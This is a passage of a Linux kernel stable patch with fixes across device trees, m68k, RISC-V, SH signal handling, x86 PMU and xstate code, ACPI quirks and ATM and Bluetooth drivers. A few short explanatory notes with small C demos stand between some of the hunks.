+ 	nvmem-cell-names = "mac-address";
+-	snps,reset-gpios = <&pca6416_1 2 GPIO_ACTIVE_LOW>;
+-	snps,reset-delays-us = <10 20 200000>;
+ 	status = "okay";
+ 
+ 	mdio {
+@@ -113,6 +111,10 @@
+ 			reg = <0>;
+ 			eee-broken-1000t;
+ 			qca,disable-smarteee;
++			qca,disable-hibernation-mode;
++			reset-gpios = <&pca6416_1 2 GPIO_ACTIVE_LOW>;
++			reset-assert-us = <20>;
++			reset-deassert-us = <200000>;
+ 			vddio-supply = <&vddio0>;
+ 
+ 			vddio0: vddio-regulator {
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts b/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
+index 6357078185edd..0e8f0d7161ad0 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-nitrogen-r2.dts
+@@ -247,7 +247,7 @@
+ 		compatible = "wlf,wm8960";
+ 		reg = <0x1a>;
+ 		clocks = <&clk IMX8MM_CLK_SAI1_ROOT>;
+-		clock-names = "mclk1";
++		clock-names = "mclk";
+ 		wlf,shared-lrclk;
+ 		#sound-dai-cells = <0>;
+ 	};
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn.dtsi b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+index ba29b5b556ffa..37246ca9d9075 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+@@ -295,6 +295,7 @@
+ 				sai2: sai@30020000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30020000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 96 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI2_IPG>,
+ 						<&clk IMX8MN_CLK_DUMMY>,
+@@ -309,6 +310,7 @@
+ 				sai3: sai@30030000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30030000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 50 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI3_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+@@ -323,6 +325,7 @@
+ 				sai5: sai@30050000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30050000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 90 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI5_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+@@ -339,6 +342,7 @@
+ 				sai6: sai@30060000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x30060000  0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 90 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI6_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+@@ -396,6 +400,7 @@
+ 				sai7: sai@300b0000 {
+ 					compatible = "fsl,imx8mn-sai", "fsl,imx8mq-sai";
+ 					reg = <0x300b0000 0x10000>;
++					#sound-dai-cells = <0>;
+ 					interrupts = <GIC_SPI 111 IRQ_TYPE_LEVEL_HIGH>;
+ 					clocks = <&clk IMX8MN_CLK_SAI7_IPG>,
+ 						 <&clk IMX8MN_CLK_DUMMY>,
+diff --git a/arch/arm64/boot/dts/freescale/imx93.dtsi b/arch/arm64/boot/dts/freescale/imx93.dtsi
+index 0247866fc86b0..8ab9f8194702e 100644
+--- a/arch/arm64/boot/dts/freescale/imx93.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx93.dtsi
+@@ -150,6 +150,8 @@
+ 			lpi2c1: i2c@44340000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x44340000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 13 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C1_GATE>,
+ 					 <&clk IMX93_CLK_BUS_AON>;
+@@ -160,6 +162,8 @@
+ 			lpi2c2: i2c@44350000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x44350000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 14 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C2_GATE>,
+ 					 <&clk IMX93_CLK_BUS_AON>;
+@@ -277,6 +281,8 @@
+ 			lpi2c3: i2c@42530000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x42530000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 62 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C3_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -287,6 +293,8 @@
+ 			lpi2c4: i2c@42540000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x42540000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 63 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C4_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -351,6 +359,8 @@
+ 			lpi2c5: i2c@426b0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426b0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 195 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C5_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -361,6 +371,8 @@
+ 			lpi2c6: i2c@426c0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426c0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 196 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C6_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -371,6 +383,8 @@
+ 			lpi2c7: i2c@426d0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426d0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 197 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C7_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+@@ -381,6 +395,8 @@
+ 			lpi2c8: i2c@426e0000 {
+ 				compatible = "fsl,imx93-lpi2c", "fsl,imx7ulp-lpi2c";
+ 				reg = <0x426e0000 0x10000>;
++				#address-cells = <1>;
++				#size-cells = <0>;
+ 				interrupts = <GIC_SPI 198 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clk IMX93_CLK_LPI2C8_GATE>,
+ 					 <&clk IMX93_CLK_BUS_WAKEUP>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 516e70bf04ce9..346da6af51ac9 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -2077,6 +2077,8 @@
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie1_clkreq_n>;
+ 
++			dma-coherent;
++
+ 			iommus = <&apps_smmu 0x1c80 0x1>;
+ 
+ 			iommu-map = <0x0 &apps_smmu 0x1c80 0x1>,
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index 4a527a64772b4..47e09d96f6098 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1810,7 +1810,7 @@
+ 				      "slave_q2a",
+ 				      "tbu";
+ 
+-			iommus = <&apps_smmu 0x1d80 0x7f>;
++			iommus = <&apps_smmu 0x1d80 0x3f>;
+ 			iommu-map = <0x0   &apps_smmu 0x1d80 0x1>,
+ 				    <0x100 &apps_smmu 0x1d81 0x1>;
+ 
+@@ -1909,7 +1909,7 @@
+ 			assigned-clocks = <&gcc GCC_PCIE_1_AUX_CLK>;
+ 			assigned-clock-rates = <19200000>;
+ 
+-			iommus = <&apps_smmu 0x1e00 0x7f>;
++			iommus = <&apps_smmu 0x1e00 0x3f>;
+ 			iommu-map = <0x0   &apps_smmu 0x1e00 0x1>,
+ 				    <0x100 &apps_smmu 0x1e01 0x1>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index df0d888ffc008..4714d7bf03b9f 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -3104,6 +3104,7 @@
+ 			power-domains = <&gcc UFS_PHY_GDSC>;
+ 
+ 			iommus = <&apps_smmu 0xe0 0x0>;
++			dma-coherent;
+ 
+ 			interconnects = <&aggre1_noc MASTER_UFS_MEM 0 &mc_virt SLAVE_EBI1 0>,
+ 					<&gem_noc MASTER_APPSS_PROC 0 &config_noc SLAVE_UFS_MEM_CFG 0>;
+diff --git a/arch/m68k/kernel/traps.c b/arch/m68k/kernel/traps.c
+index 5c8cba0efc63e..a700807c9b6d9 100644
+--- a/arch/m68k/kernel/traps.c
++++ b/arch/m68k/kernel/traps.c
+@@ -30,6 +30,7 @@
+ #include <linux/init.h>
+ #include <linux/ptrace.h>
+ #include <linux/kallsyms.h>
++#include <linux/extable.h>
+ 
+ #include <asm/setup.h>
+ #include <asm/fpu.h>
+@@ -545,7 +546,8 @@ static inline void bus_error030 (struct frame *fp)
+ 			errorcode |= 2;
+ 
+ 		if (mmusr & (MMU_I | MMU_WP)) {
+-			if (ssw & 4) {
++			/* We might have an exception table for this PC */
++			if (ssw & 4 && !search_exception_tables(fp->ptregs.pc)) {
+ 				pr_err("Data %s fault at %#010lx in %s (pc=%#lx)\n",
+ 				       ssw & RW ? "read" : "write",
+ 				       fp->un.fmtb.daddr,
+diff --git a/arch/m68k/mm/motorola.c b/arch/m68k/mm/motorola.c
+index 2a375637e0077..9113012240789 100644
+--- a/arch/m68k/mm/motorola.c
++++ b/arch/m68k/mm/motorola.c
+@@ -437,7 +437,7 @@ void __init paging_init(void)
+ 	}
+ 
+ 	min_addr = m68k_memory[0].addr;
+-	max_addr = min_addr + m68k_memory[0].size;
++	max_addr = min_addr + m68k_memory[0].size - 1;
+ 	memblock_add_node(m68k_memory[0].addr, m68k_memory[0].size, 0,
+ 			  MEMBLOCK_NONE);
+ 	for (i = 1; i < m68k_num_memory;) {
+@@ -452,21 +452,21 @@ void __init paging_init(void)
+ 		}
+ 		memblock_add_node(m68k_memory[i].addr, m68k_memory[i].size, i,
+ 				  MEMBLOCK_NONE);
+-		addr = m68k_memory[i].addr + m68k_memory[i].size;
++		addr = m68k_memory[i].addr + m68k_memory[i].size - 1;
+ 		if (addr > max_addr)
+ 			max_addr = addr;
+ 		i++;
+ 	}
+ 	m68k_memoffset = min_addr - PAGE_OFFSET;
+-	m68k_virt_to_node_shift = fls(max_addr - min_addr - 1) - 6;
++	m68k_virt_to_node_shift = fls(max_addr - min_addr) - 6;
+ 
+ 	module_fixup(NULL, __start_fixup, __stop_fixup);
+ 	flush_icache();
+ 
+-	high_memory = phys_to_virt(max_addr);
++	high_memory = phys_to_virt(max_addr) + 1;
+ 
+ 	min_low_pfn = availmem >> PAGE_SHIFT;
+-	max_pfn = max_low_pfn = max_addr >> PAGE_SHIFT;
++	max_pfn = max_low_pfn = (max_addr >> PAGE_SHIFT) + 1;
+ 
+ 	/* Reserve kernel text/data/bss and the memory allocated in head.S */
+ 	memblock_reserve(m68k_memory[0].addr, availmem - m68k_memory[0].addr);
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index 8e5fd56820189..ae11d5647f9d4 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -442,6 +442,28 @@ config TOOLCHAIN_HAS_ZIHINTPAUSE
+ 	depends on !32BIT || $(cc-option,-mabi=ilp32 -march=rv32ima_zihintpause)
+ 	depends on LLD_VERSION >= 150000 || LD_VERSION >= 23600
+ 
++config TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
++	def_bool y
++	# https://sourceware.org/git/?p=binutils-gdb.git;a=commit;h=aed44286efa8ae8717a77d94b51ac3614e2ca6dc
++	depends on AS_IS_GNU && AS_VERSION >= 23800
++	help
++	  Newer binutils versions default to ISA spec version 20191213 which
++	  moves some instructions from the I extension to the Zicsr and Zifencei
++	  extensions.
++
++config TOOLCHAIN_NEEDS_OLD_ISA_SPEC
++	def_bool y
++	depends on TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI
++	# https://github.com/llvm/llvm-project/commit/22e199e6afb1263c943c0c0d4498694e15bf8a16
++	depends on CC_IS_CLANG && CLANG_VERSION < 170000
++	help
++	  Certain versions of clang do not support zicsr and zifencei via -march
++	  but newer versions of binutils require it for the reasons noted in the
++	  help text of CONFIG_TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI. This
++	  option causes an older ISA spec compatible with these older versions
++	  of clang to be passed to GAS, which has the same result as passing zicsr
++	  and zifencei to -march.
++
+ config FPU
+ 	bool "FPU support"
+ 	default y
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index 8b4ddccea2795..3cb876f83187d 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -57,10 +57,12 @@ riscv-march-$(CONFIG_ARCH_RV64I)	:= rv64ima
+ riscv-march-$(CONFIG_FPU)		:= $(riscv-march-y)fd
+ riscv-march-$(CONFIG_RISCV_ISA_C)	:= $(riscv-march-y)c
+ 
+-# Newer binutils versions default to ISA spec version 20191213 which moves some
+-# instructions from the I extension to the Zicsr and Zifencei extensions.
+-toolchain-need-zicsr-zifencei := $(call cc-option-yn, -march=$(riscv-march-y)_zicsr_zifencei)
+-riscv-march-$(toolchain-need-zicsr-zifencei) := $(riscv-march-y)_zicsr_zifencei
++ifdef CONFIG_TOOLCHAIN_NEEDS_OLD_ISA_SPEC
++KBUILD_CFLAGS += -Wa,-misa-spec=2.2
++KBUILD_AFLAGS += -Wa,-misa-spec=2.2
++else
++riscv-march-$(CONFIG_TOOLCHAIN_NEEDS_EXPLICIT_ZICSR_ZIFENCEI) := $(riscv-march-y)_zicsr_zifencei
++endif
+ 
+ # Check if the toolchain supports Zicbom extension
+ riscv-march-$(CONFIG_TOOLCHAIN_HAS_ZICBOM) := $(riscv-march-y)_zicbom
+diff --git a/arch/riscv/include/asm/tlbflush.h b/arch/riscv/include/asm/tlbflush.h
+index 801019381dea3..a09196f8de688 100644
+--- a/arch/riscv/include/asm/tlbflush.h
++++ b/arch/riscv/include/asm/tlbflush.h
+@@ -12,6 +12,8 @@
+ #include <asm/errata_list.h>
+ 
+ #ifdef CONFIG_MMU
++extern unsigned long asid_mask;
++
+ static inline void local_flush_tlb_all(void)
+ {
+ 	__asm__ __volatile__ ("sfence.vma" : : : "memory");
+diff --git a/arch/riscv/include/uapi/asm/setup.h b/arch/riscv/include/uapi/asm/setup.h
+new file mode 100644
+index 0000000000000..66b13a5228808
+--- /dev/null
++++ b/arch/riscv/include/uapi/asm/setup.h
+@@ -0,0 +1,8 @@
++/* SPDX-License-Identifier: GPL-2.0-only WITH Linux-syscall-note */
++
++#ifndef _UAPI_ASM_RISCV_SETUP_H
++#define _UAPI_ASM_RISCV_SETUP_H
++
++#define COMMAND_LINE_SIZE	1024
++
++#endif /* _UAPI_ASM_RISCV_SETUP_H */
+diff --git a/arch/riscv/mm/context.c b/arch/riscv/mm/context.c
+index 0f784e3d307bb..12e22e7330e7b 100644
+--- a/arch/riscv/mm/context.c
++++ b/arch/riscv/mm/context.c
+@@ -22,7 +22,7 @@ DEFINE_STATIC_KEY_FALSE(use_asid_allocator);
+ 
+ static unsigned long asid_bits;
+ static unsigned long num_asids;
+-static unsigned long asid_mask;
++unsigned long asid_mask;
+ 
+ static atomic_long_t current_version;
+ 
+diff --git a/arch/riscv/mm/tlbflush.c b/arch/riscv/mm/tlbflush.c
+index 37ed760d007c3..ef701fa83f368 100644
+--- a/arch/riscv/mm/tlbflush.c
++++ b/arch/riscv/mm/tlbflush.c
+@@ -42,7 +42,7 @@ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 	/* check if the tlbflush needs to be sent to other CPUs */
+ 	broadcast = cpumask_any_but(cmask, cpuid) < nr_cpu_ids;
+ 	if (static_branch_unlikely(&use_asid_allocator)) {
+-		unsigned long asid = atomic_long_read(&mm->context.id);
++		unsigned long asid = atomic_long_read(&mm->context.id) & asid_mask;
+ 
+ 		if (broadcast) {
+ 			sbi_remote_sfence_vma_asid(cmask, start, size, asid);
+diff --git a/arch/sh/include/asm/processor_32.h b/arch/sh/include/asm/processor_32.h
+index 27aebf1e75a20..3ef7adf739c83 100644
+--- a/arch/sh/include/asm/processor_32.h
++++ b/arch/sh/include/asm/processor_32.h
+@@ -50,6 +50,7 @@
+ #define SR_FD		0x00008000
+ #define SR_MD		0x40000000
+ 
++#define SR_USER_MASK	0x00000303	// M, Q, S, T bits
+ /*
+  * DSP structure and data
+  */
+diff --git a/arch/sh/kernel/signal_32.c b/arch/sh/kernel/signal_32.c
+index 90f495d35db29..a6bfc6f374911 100644
+--- a/arch/sh/kernel/signal_32.c
++++ b/arch/sh/kernel/signal_32.c
+@@ -115,6 +115,7 @@ static int
+ restore_sigcontext(struct pt_regs *regs, struct sigcontext __user *sc, int *r0_p)
+ {
+ 	unsigned int err = 0;
++	unsigned int sr = regs->sr & ~SR_USER_MASK;
+ 
+ #define COPY(x)		err |= __get_user(regs->x, &sc->sc_##x)
+ 			COPY(regs[1]);
+@@ -130,6 +131,8 @@ restore_sigcontext(struct pt_regs *regs, struct sigcontext __user *sc, int *r0_p
+ 	COPY(sr);	COPY(pc);
+ #undef COPY
+ 
++	regs->sr = (regs->sr & SR_USER_MASK) | sr;
++
+ #ifdef CONFIG_SH_FPU
+ 	if (boot_cpu_data.flags & CPU_HAS_FPU) {
+ 		int owned_fp;
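The sigreturn fix above keeps the privileged SR bits the kernel already holds and accepts only the user-visible M/Q/S/T bits from the user-supplied sigcontext. A runnable sketch of the masking (the register values are invented for the demo):

#include <stdio.h>

#define SR_USER_MASK 0x00000303UL	/* M, Q, S, T bits */

int main(void)
{
	unsigned long kernel_sr = 0x40008100UL;	/* invented current SR */
	unsigned long user_sr = 0xffffffffUL;	/* hostile sigcontext value */
	unsigned long kept = kernel_sr & ~SR_USER_MASK;
	unsigned long restored = (user_sr & SR_USER_MASK) | kept;

	/* Only the M/Q/S/T bits came from user space. */
	printf("restored SR: %#lx\n", restored);
	return 0;
}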
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index 4386b10682ce4..8ca5e827f30b2 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -923,6 +923,7 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 
+ 		/* Event overflow */
+ 		handled++;
++		status &= ~mask;
+ 		perf_sample_data_init(&data, 0, hwc->last_period);
+ 
+ 		if (!x86_perf_event_set_period(event))
+@@ -935,8 +936,6 @@ static int amd_pmu_v2_handle_irq(struct pt_regs *regs)
+ 
+ 		if (perf_event_overflow(event, &data, regs))
+ 			x86_pmu_stop(event, 0);
+-
+-		status &= ~mask;
+ 	}
+ 
+ 	/*
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index 714166cc25f2f..0bab497c94369 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -1118,21 +1118,20 @@ void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+ 	zerofrom = offsetof(struct xregs_state, extended_state_area);
+ 
+ 	/*
+-	 * The ptrace buffer is in non-compacted XSAVE format.  In
+-	 * non-compacted format disabled features still occupy state space,
+-	 * but there is no state to copy from in the compacted
+-	 * init_fpstate. The gap tracking will zero these states.
+-	 */
+-	mask = fpstate->user_xfeatures;
+-
+-	/*
+-	 * Dynamic features are not present in init_fpstate. When they are
+-	 * in an all zeros init state, remove those from 'mask' to zero
+-	 * those features in the user buffer instead of retrieving them
+-	 * from init_fpstate.
++	 * This 'mask' indicates which states to copy from fpstate.
++	 * Those extended states that are not present in fpstate are
++	 * either disabled or initialized:
++	 *
++	 * In non-compacted format, disabled features still occupy
++	 * state space but there is no state to copy from in the
++	 * compacted init_fpstate. The gap tracking will zero these
++	 * states.
++	 *
++	 * The extended features have an all zeroes init state. Thus,
++	 * remove them from 'mask' to zero those features in the user
++	 * buffer instead of retrieving them from init_fpstate.
+ 	 */
+-	if (fpu_state_size_dynamic())
+-		mask &= (header.xfeatures | xinit->header.xcomp_bv);
++	mask = header.xfeatures;
+ 
+ 	for_each_extended_xfeature(i, mask) {
+ 		/*
+@@ -1151,9 +1150,8 @@ void __copy_xstate_to_uabi_buf(struct membuf to, struct fpstate *fpstate,
+ 			pkru.pkru = pkru_val;
+ 			membuf_write(&to, &pkru, sizeof(pkru));
+ 		} else {
+-			copy_feature(header.xfeatures & BIT_ULL(i), &to,
++			membuf_write(&to,
+ 				     __raw_xsave_addr(xsave, i),
+-				     __raw_xsave_addr(xinit, i),
+ 				     xstate_sizes[i]);
+ 		}
+ 		/*
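With 'mask = header.xfeatures', only states actually present in the saved buffer are copied; everything else falls into a gap that the writer zero-fills. An illustrative standalone loop (the feature numbering is made up):

#include <stdio.h>

int main(void)
{
	/* Pretend only features 0 and 2 are in-use in the saved buffer. */
	unsigned long long xfeatures = (1ULL << 0) | (1ULL << 2);

	for (int i = 0; i < 4; i++) {
		if (xfeatures & (1ULL << i))
			printf("feature %d: copy from fpstate\n", i);
		else
			printf("feature %d: zero-fill (gap tracking)\n", i);
	}
	return 0;
}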
+diff --git a/drivers/acpi/x86/s2idle.c b/drivers/acpi/x86/s2idle.c
+index c7afce465a071..e499c60c45791 100644
+--- a/drivers/acpi/x86/s2idle.c
++++ b/drivers/acpi/x86/s2idle.c
+@@ -384,29 +384,6 @@ static const struct acpi_device_id amd_hid_ids[] = {
+ 	{}
+ };
+ 
+-static int lps0_prefer_amd(const struct dmi_system_id *id)
+-{
+-	pr_debug("Using AMD GUID w/ _REV 2.\n");
+-	rev_id = 2;
+-	return 0;
+-}
+-static const struct dmi_system_id s2idle_dmi_table[] __initconst = {
+-	{
+-		/*
+-		 * AMD Rembrandt based HP EliteBook 835/845/865 G9
+-		 * Contains specialized AML in AMD/_REV 2 path to avoid
+-		 * triggering a bug in Qualcomm WLAN firmware. This may be
+-		 * removed in the future if that firmware is fixed.
+-		 */
+-		.callback = lps0_prefer_amd,
+-		.matches = {
+-			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
+-			DMI_MATCH(DMI_BOARD_NAME, "8990"),
+-		},
+-	},
+-	{}
+-};
+-
+ static int lps0_device_attach(struct acpi_device *adev,
+ 			      const struct acpi_device_id *not_used)
+ {
+@@ -586,7 +563,6 @@ static const struct platform_s2idle_ops acpi_s2idle_ops_lps0 = {
+ 
+ void __init acpi_s2idle_setup(void)
+ {
+-	dmi_check_system(s2idle_dmi_table);
+ 	acpi_scan_add_handler(&lps0_handler);
+ 	s2idle_set_ops(&acpi_s2idle_ops_lps0);
+ }
+diff --git a/drivers/acpi/x86/utils.c b/drivers/acpi/x86/utils.c
+index 4e816bb402f68..e45285d4e62a4 100644
+--- a/drivers/acpi/x86/utils.c
++++ b/drivers/acpi/x86/utils.c
+@@ -200,39 +200,28 @@ bool acpi_device_override_status(struct acpi_device *adev, unsigned long long *s
+  * a hardcoded allowlist for D3 support, which was used for these platforms.
+  *
+  * This allows quirking on Linux in a similar fashion.
++ *
++ * Cezanne systems shouldn't *normally* need this as the BIOS includes
++ * StorageD3Enable.  But we have added it for two reasons:
++ * 1) The BIOS on a number of Dell systems is ambiguous: the same value
++ *    is used for _ADR on the ACPI nodes GPP1.DEV0 and GPP1.NVME, and
++ *    GPP1.NVME is needed to get the StorageD3Enable node set properly.
++ *    https://bugzilla.kernel.org/show_bug.cgi?id=216440
++ *    https://bugzilla.kernel.org/show_bug.cgi?id=216773
++ *    https://bugzilla.kernel.org/show_bug.cgi?id=217003
++ * 2) On at least one HP system StorageD3Enable is missing on the second NVME
++ *    disk in the system.
+  */
+ static const struct x86_cpu_id storage_d3_cpu_ids[] = {
+ 	X86_MATCH_VENDOR_FAM_MODEL(AMD, 23, 96, NULL),	/* Renoir */
+ 	X86_MATCH_VENDOR_FAM_MODEL(AMD, 23, 104, NULL),	/* Lucienne */
+-	{}
+-};
+-
+-static const struct dmi_system_id force_storage_d3_dmi[] = {
+-	{
+-		/*
+-		 * _ADR is ambiguous between GPP1.DEV0 and GPP1.NVME
+-		 * but .NVME is needed to get StorageD3Enable node
+-		 * https://bugzilla.kernel.org/show_bug.cgi?id=216440
+-		 */
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Inspiron 14 7425 2-in-1"),
+-		}
+-	},
+-	{
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Inspiron 16 5625"),
+-		}
+-	},
++	X86_MATCH_VENDOR_FAM_MODEL(AMD, 25, 80, NULL),	/* Cezanne */
+ 	{}
+ };
+ 
+ bool force_storage_d3(void)
+ {
+-	const struct dmi_system_id *dmi_id = dmi_first_match(force_storage_d3_dmi);
+-
+-	return dmi_id || x86_match_cpu(storage_d3_cpu_ids);
++	return x86_match_cpu(storage_d3_cpu_ids);
+ }
+ 
+ /*
+diff --git a/drivers/atm/idt77252.c b/drivers/atm/idt77252.c
+index 681cb3786794d..49cb4537344aa 100644
+--- a/drivers/atm/idt77252.c
++++ b/drivers/atm/idt77252.c
+@@ -2909,6 +2909,7 @@ close_card_oam(struct idt77252_dev *card)
+ 
+ 				recycle_rx_pool_skb(card, &vc->rcv.rx_pool);
+ 			}
++			kfree(vc);
+ 		}
+ 	}
+ }
+@@ -2952,6 +2953,15 @@ open_card_ubr0(struct idt77252_dev *card)
+ 	return 0;
+ }
+ 
++static void
++close_card_ubr0(struct idt77252_dev *card)
++{
++	struct vc_map *vc = card->vcs[0];
++
++	free_scq(card, vc->scq);
++	kfree(vc);
++}
++
+ static int
+ idt77252_dev_open(struct idt77252_dev *card)
+ {
+@@ -3001,6 +3011,7 @@ static void idt77252_dev_close(struct atm_dev *dev)
+ 	struct idt77252_dev *card = dev->dev_data;
+ 	u32 conf;
+ 
++	close_card_ubr0(card);
+ 	close_card_oam(card);
+ 
+ 	conf = SAR_CFG_RXPTH |	/* enable receive path           */
+diff --git a/drivers/bluetooth/btqcomsmd.c b/drivers/bluetooth/btqcomsmd.c
+index 2acb719e596f5..11c7e04bf3947 100644
+--- a/drivers/bluetooth/btqcomsmd.c
++++ b/drivers/bluetooth/btqcomsmd.c
+@@ -122,6 +122,21 @@ static int btqcomsmd_setup(struct hci_dev *hdev)
+ 	return 0;
+ }
+ 
++static int btqcomsmd_set_bdaddr(struct hci_dev *hdev, const bdaddr_t *bdaddr)
++{
++	int ret;
++
++	ret = qca_set_bdaddr_rome(hdev, bdaddr);
++	if (ret)
++		return ret;
++
++	/* The firmware stops responding for a while after setting the bdaddr,
++	 * causing timeouts for subsequent commands. Sleep a bit to avoid this.
++	 */
++	usleep_range(1000, 10000);
++	return 0;
++}
++
+ static int btqcomsmd_probe(struct platform_device *pdev)
+ {
+ 	struct btqcomsmd *btq;
+@@ -162,7 +177,7 @@ static int btqcomsmd_probe(struct platform_device *pdev)
+ 	hdev->close = btqcomsmd_close;
+ 	hdev->send = btqcomsmd_send;
+ 	hdev->setup = btqcomsmd_setup;
+-	hdev->set_bdaddr = qca_set_bdaddr_rome;
++	hdev->set_bdaddr = btqcomsmd_set_bdaddr;
+ 
+ 	ret = hci_register_dev(hdev);
+ 	if (ret < 0)
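The wrapper added above is the usual "call the vendor hook, then let the firmware settle" pattern. A userspace model (the stub name is invented; nanosleep() stands in for the kernel's usleep_range()):

#include <stdio.h>
#include <time.h>

static int vendor_set_bdaddr(void)	/* stand-in for qca_set_bdaddr_rome() */
{
	return 0;
}

static int set_bdaddr_with_settle(void)
{
	int ret = vendor_set_bdaddr();

	if (ret)
		return ret;

	/* The firmware goes quiet briefly after the address change. */
	nanosleep(&(struct timespec){ .tv_nsec = 1000 * 1000 }, NULL);
	return 0;
}

int main(void)
{
	printf("set_bdaddr: %d\n", set_bdaddr_with_settle());
	return 0;
}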
